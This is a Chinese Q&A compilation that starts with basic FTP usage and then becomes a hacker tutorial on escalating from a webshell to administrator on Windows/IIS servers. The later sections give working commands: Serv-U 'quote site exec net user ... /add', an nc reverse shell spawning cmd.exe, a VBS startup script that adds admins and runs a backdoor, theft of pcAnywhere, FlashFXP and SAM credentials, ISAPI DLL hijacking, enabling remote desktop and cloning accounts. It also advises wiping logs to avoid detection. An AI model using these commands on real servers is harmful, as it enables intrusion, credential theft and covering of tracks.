ftp提权怎么做
㈠ 怎么知道ftp的用户名和密码
如何知道自己网站的FTP用户名跟密码?
FTP格式为:ftp://用户名:密码@地址:端口/(如果默认端口是21则不需要填写端口)
比如:ftp://test:[email protected]:21/profile
1、用户名和密码为:test、test。
2、服务器IP和port为:192.168.0.1:21
3、登录后转到profile文件夹
输入FTP用户名和密码操作方法如下:
1、打开浏览器,在地址栏中输入ftp://服务器IP地址。然后回车。
2、这时候会出现一个验证界面,需要输入分配的用户名和密码。没有话就不能访问了,输入后点击登录。
3、接下来就进入了FTP服务器中,就可以进行文件的上传和下载了。
拓展资料:
FTP是FileTransferProtocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。
基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:"下载"(Download)和"上传"(Upload)。
"下载"文件就是从远程主机拷贝文件至自己的计算机上;"上传"文件就是将文件从自己的计算机中拷贝至远程主机上。用Internet语言来说,用户可通过客户机程序向(从)远程主机上传(下载)文件。
ftp服务器密码忘记怎么办?
泻药不用reset键是可以的1,如果你有USB转ttl线,拆机接ttl连电脑,通过ttl通信读取闪存数据2,如果你有芯片编程器,热风枪取下闪存,丢编程器读数据3,如果你给路由器的ftp设置了最高权限并且记得FTP的账号密码,那么可以尝试通过FTP读取数据4,还有个高难度办法,如果路由器端运行着某些拥有额外网页控制的插件比如plex,可以考虑通过插件然后提权读数据,不过不保证成功,这是迫不得已下的可以尝试的办法我一般用方法1,ttl大法真痛快
ftp查看方式?
1、打开我的电脑,在地址栏里输入FTP地址,如:ftp://225.123.256.32出现对话框
2、使用浏览器访问,即在浏览器地址栏里输入FTP地址,如:ftp://225.123.256.32
3、按win+R,键入ftp地址,如ftp://225.123.256.32/
4.使用FTP软件访问,如CuteFTP,8UFTP等
若要想对访问到的ftp服务器里的文件做操作,那么就需要在具有权限的情况下,
可以通过在ftp访问地址上连带上用户名密码来使其具有权限,如ftp访问地址时:ftp://username:[email protected]
或是使用软件,软件中输入用户名密码即可操作。
另外,也可以在cmd中使用命令行操作
ftp匿名账号是什么?
匿名账号为anonymous,使用FTP时必须首先登录,在远程主机上获得相应的权限以后,方可上传或下载文件。
也就是说,要想同哪一台计算机传送文件,就必须具有哪一台计算机的适当授权。换言之,除非有用户ID和口令,否则便无法传送文件。比如你想下载一个ftp空间里的文件,你必须有账户名密码才可以下载,而用户可通过它连接到远程主机上,并从其下载文件,而无需成为其注册用户。系统管理员建立了一个特殊的用户ID,名为anonymous,Internet上的任何人在任何地方都可使用该用户ID。这样就可以下载该文件了。
xp系统如何设置ftp的密码和账户?
XP系统上搭建FTP的方法如下:
1、首先下载iis软件包,打开浏览器开始搜索iis软件包,注意是xp系统的iis软件包哦!压缩后的iis软件包大约是11M左右
2、查找适合xp系统的iis软件包,下载,安装即可。
3、现在开始安装iis,单击开始菜单,选择“控制面板”
4、选择“添加和删除程序”
5、、点击“添加或删除windows组件”,选择添加“Internet信息服务”,文件选择开始下载的iis文件包即可。
6、开始安装iis,并选择“ftp文件传输协议”。在安装过程中,会提示多次选择文件,选择下载的iis文件包即可。
7、用鼠标选择电脑,然后单击鼠标右键选择“管理”
8、在ftp站点上单击鼠标右键选择属性,开始配置ftp站点。
9、配置完成后,现在就可以去试试用ftp上传和下载文件了。
㈡ 关于WEBSHLL提权
关于提权的方法太多,偶逃了两节课整理出下面几点偶辅导员不会看到了吧
一:利用serv-u本地提权.使用最频繁..所有提权中成功率最高.
工具ftp.exe
c:\winnt\system32\inetsrv\data\
C:\Documents and Settings\All Users\Documents
站点根目录
二:修改d:\Program Files\serv-u目录下的ServUDaemon.ini来提权
[USER=angel|1]
Password=
HomeDir=D:\websites
RelPaths=1
TimeOut=600
Maintenance=System
Access1=D:\websites|RWAMELCDP
SKEYValues=
用户是angel 密码是 111111
在本地cmd上进行ftp命令
c:\>ftp ip
ftp>quote site exec net user 123$ 123456 /add
ftp>quote site exec net localgroup administrators 123$ /add
再在站点根目录上传nc.exe进行反向连接
ftp>quote site exec d:\wwwroot\bbs\nc 自己ip 2005 >> nc -e cmd.exe (此时用nc再监听一个端口nc -l -p 2005)
三:通过数据库连接文件获取数据库账号密码提升权限
编辑在根目录下查找文件conn.asp
查找sqlUsername 和 sqlPassword
用sqltools连接
四:通过写脚本到启动项目
C:\Documents and Settings\All Users\开始\程序\启动\
五:通过pcanywhere提权
账号密码存放在
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
下载cif结尾的文件..然后破解..上去以后直接
webshell提权补充 - -
话说到花了九牛二虎的力气获得了一个webshell,
当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~
嘻嘻~~好跟我来,看看有什么可以利用的来提升权限
****************************************************************************
第一
如果服务器上有装了pcanywhere服务端,管理员为了管理方便
也给了我们方便,到系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地
破解就使用pcanywhere连接就ok了
****************************************************************************
第二
有很多小黑问我这么把webshell的iis user权限提升
一般服务器的管理都是本机设计完毕然后上传到空间里,
那么就会用到ftp,服务器使用最多的就是servu
那么我们就利用servu来提升权限
通过servu提升权限需要servu安装目录可写~
好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载
下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,
启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里把ServUDaemon.ini更换服务器上的。
用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //刚才添加的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe
文件加用户。
如果提示没有权限,那我们就
把后门(server.exe) 传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user user pass /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)
存为xx.vbe
这个教本的作用是建立user用户密码为pass
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他 C:\Documents and Settings\All Users\“开始”菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本.
接下来就是等了.等他登陆.
****************************************************************************
第三
就是先检查有什么系统服务,或者随系统启动自动启动的程序和管理员经常使用的软件, 比如诺顿,VAdministrator,金山,瑞星,WinRAR甚至QQ之类的,是否可以写,如果可以就修改其程序, 绑定一个批处理或者VBS,然后还是等待服务器重启。
****************************************************************************
第四
查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码,可能会有所
收获等等。
****************************************************************************
第五
使用Flashfxp也能提升权限,但是成功率就看你自己的运气了
首先找到FlashFXP文件夹,打开(编辑)Sites. dat,这个文件这是什么东西密码和用户名,
而且密码是加了密的。 如果我把这些文件回本地也就是我的计算机中,替换我本地的相应文件。然后会发现 打开flashfxp在站点中打开站点管理器一样。又可以添加N多肉鸡啦~~嘻嘻~
唔??不对啊,是来提升权限的啊,晕,接着来别半途而废。
大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。经过用xp星号密码 查看器查看,然后和Sites.dat中加密了密码做比较发现并未加密而是查到的密码是明文显示, 然后最终把这个网站管理员的密码从这堆东西中找
出来。那么下一步就可以链接这些新的服务器啦~~
经过测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地
还原对方管理员的各个站点的密码。
****************************************************************************
第六
WIN2K+IIS5.0默认情况下应用程序保护选项是"中(共用的)",这时IIS加载isapi是用的
iwam_computername用户身份执行。
但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5 、
win2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名,并且没有做目录限制,
以SYSTEM权限加载的isapi有:
1、 idq.dll
2、 httpext.dll
3、 httpodbc.dll
4、 ssinc.dll
5、 msw3prt.dll
6、 author.dll
7、 admin.dll
8、 shtml.dll
9、 sspifilt.dll
10、compfilt.dll
11、pwsdata.dll
12、md5filt.dll
13、fpexedll.dll
所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug,比如请求/scripts/test%81%5cssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双字节的 远东版问题。ssinc.dll在处理包含文件路径的时候也有一个问题,就是"/"、"\"只识别了一个 "/",所以如果请求里面使用"\",就会错误的处理包含文件路径,有可能泄露东西或者出现权限 漏洞,这种漏洞很多别的地方( php、asp等)也还存在。
加载这些isapi不是单以文件名做依据了,而是加了路径,应该是修正了此问题。
一般默认情况下是:
1、 idq.dll d:\winnt\system32\idq.dll
2、 httpext.dll d:\winnt\system32\inetsrv\httpext.dll
3、 httpodbc.dll d:\winnt\system32\inetsrv\httpodbc.dll
4、 ssinc.dll d:\winnt\system32\inrtsrv\ssinc.dll
5、 msw3prt.dll d:\winnt\system32\msw3prt.dll
6、 author.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\author.dll
7、 admin.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\admin.dll
8、 shtml.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\shtml.dll
9、 sspifilt.dll d:\winnt\system32\inetsrv\sspifilt.dll
10、compfilt.dll d:\winnt\system32\inetsrv\compfilt.dll
11、pwsdata.dll d:\winnt\system32\inetsrv\pwsdata.dll
12、md5filt.dll d:\winnt\system32\inetsrv\md5filt.dll
13、fpexedll.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fpexedll.dll
正常情况下这些路径都guest不能写,但如果配置不好,这些路径iis user能够写了就一样可以提升权限了
可以把ISAPIHack.dll上传到IIS的可执行目录,文件名可叫ssinc.dll或者admin.dll等(上面列的13个文件名之一)。
然后等待IIS重启加载此dll,就可以获得权限了
****************************************************************************
第七
下载系统的 %windir%\repair\sam.*(WinNT 4下是sam._ 而Windows 2000下是sam)文件,
然后用L0pht等软件进行破解,只要能拿到,肯花时间,就一定可以破解。
****************************************************************************
第八
PipeUpAdmin(Windows 2000下), 在本机运行可以把当前用户帐号加入管理员组。普通用户和Guests组用户都可以成功运行。 第九
Serv-u Ftp Server 本地权限提升漏洞:
很多主机的C:\Documents and Settings\All Users\ Documents目录以及下边几个子目录Documents没有设置权限,导致可以在这个目录上传并运行Exp. 直接上传了serv-u local exploit 和nc, 并且把serv-u的本地提升权限的名字命名为su.exe 文件就放在C:\Documents and Settings\All Users\ Documents, 然后我们用su.exe直接建立用户,也可以反弹一个shell过来的。
具体命令:
建立用户: serv-u.exe "cmd"
>USER xl
>PASS 111111
反弹shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
㈢ ftp提权的问题
开始 要提权 首先得看看这里 服务器信息-组件支持 一般提权都会利用到这个
wscript.shell √ 命令行执行组件
在看看这里 开了终端了 有时候没开也会显示3389
个人爱好 提权的时候先看看有没有FTP 还有有没有开启终端的
方法比较简单 看操作 CMD里面输入命令FTP 目标地址 显示Serv-U FTP Server v6.2
有开FTP 而且是6.2版本的 有利用价值 这个让我们想到FTP的提权
连得上 说明开着 (小提示 如果没连得上有可能是改端口了 也有可能是没开 可以用扫描器扫一下)
接着上传一个ASP的提权脚本 lake大哥的 大家都熟悉吧 都英文来的
我简单说明一下就好了 Add User 这里是添加 Del User 删除
RUN提交 上面的默认不用修改 FTP user lake pass admin123 添加了
FTP帐号 lake 密码 admin123
连连 呵呵 进去了 说明添加帐户成功 接下来呢 就添加管理员帐号了 如果没开终端的话 也可以现在开
说明一下 现在添加的这个lake帐户是具有管理权限的哦 用到下面的命令
quote site exec net user shayu 83073645 /add添加用户
200 EXEC command successful (TID=33).
成功 继续添加权限
200 EXEC command successful (TID=33) OK了
服务器的3389已经被我开过了 我简单演示一下怎么开就OK了
用到一个工具AIO.exe 对了还得看看对方的机子是什么系统才好开3389 我已经事先看了
集体的是在WEBSHELL里面用CMD命令 VER 就可以知道了 没权限的话就自己传个CMD过去
现在看操作 我用工具传过去比较方便点
命令 quote site exec Aio.exe -Terminal 3389
在这里输入 不过注意下 那个是FTP下运行的命令 所以要在前面加上quote site exec这个才可以
OK 开了 在用这个命令Aio.exe -Clone Administrator Guest 83073645克隆帐户 也可以用之前的直接
登陆也可以 OK 到这里提权就完毕了 接下来的自由发挥了
走的时候别忘了擦PP咯 不然给人抓了 我可不管了 那边的是我用GUEST帐号登陆的 忽忽
清楚系统的日志掉了 可以的话 大家自己找找WEB的日志还有FTP的都要删除掉 我就不演示了
就到这里 88咯
相关命令:
Aio.exe -Clone Administrator Guest 83073645
Aio.exe -Terminal 3389
ftp提权命令:quote site exec net user shayu 83073645 /add
quote site exec net localgroup administrators shayu /add